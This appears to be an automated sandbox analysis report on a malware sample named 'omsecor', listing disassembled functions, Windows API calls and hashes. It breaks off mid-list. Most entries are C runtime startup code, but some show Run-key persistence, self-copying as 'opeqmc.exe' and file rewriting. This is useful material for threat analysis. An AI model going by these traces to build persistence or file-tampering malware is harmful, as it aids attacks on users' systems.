                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph (rendered graph omitted; entry block 404854-404876: call 401b18; further blocks call LoadLibraryA, GetProcAddress and subroutines 401aaa, 4021f2, 404121, 401b21 and 402229)
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph
                          • Graph image not included; basic blocks 00402C5B-00402E9A, calling GetStartupInfoA, GetStdHandle, GetFileType and SetHandleCount, plus subroutines 00402F98, 00404032, 00402FDD and 00404763.
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph
                          • Graph image not included; basic blocks 00403BD3-00403DAB, calling IsValidCodePage and GetCPInfo, plus subroutines 00403B59, 00403854, 00405F60, 00401662, 00403825 and 004038A9.
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph
                          • Graph image not included; basic blocks 00401AAA-00401B17, calling TlsGetValue, GetModuleHandleA and GetProcAddress, plus subroutine 00401A3E.
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph
                          • Graph image not included; basic blocks 00401B21-00401B8E, calling TlsGetValue, GetModuleHandleA and GetProcAddress, plus subroutine 00401A3E.
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(00601588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Control-flow Graph
                          • Graph image not included; basic blocks 0040ABD9-0040AC1F, calling FindFirstFileW and FindClose, plus subroutine 0040AC20.
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • HeapAlloc.KERNEL32(00000000), ref: 0040763F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
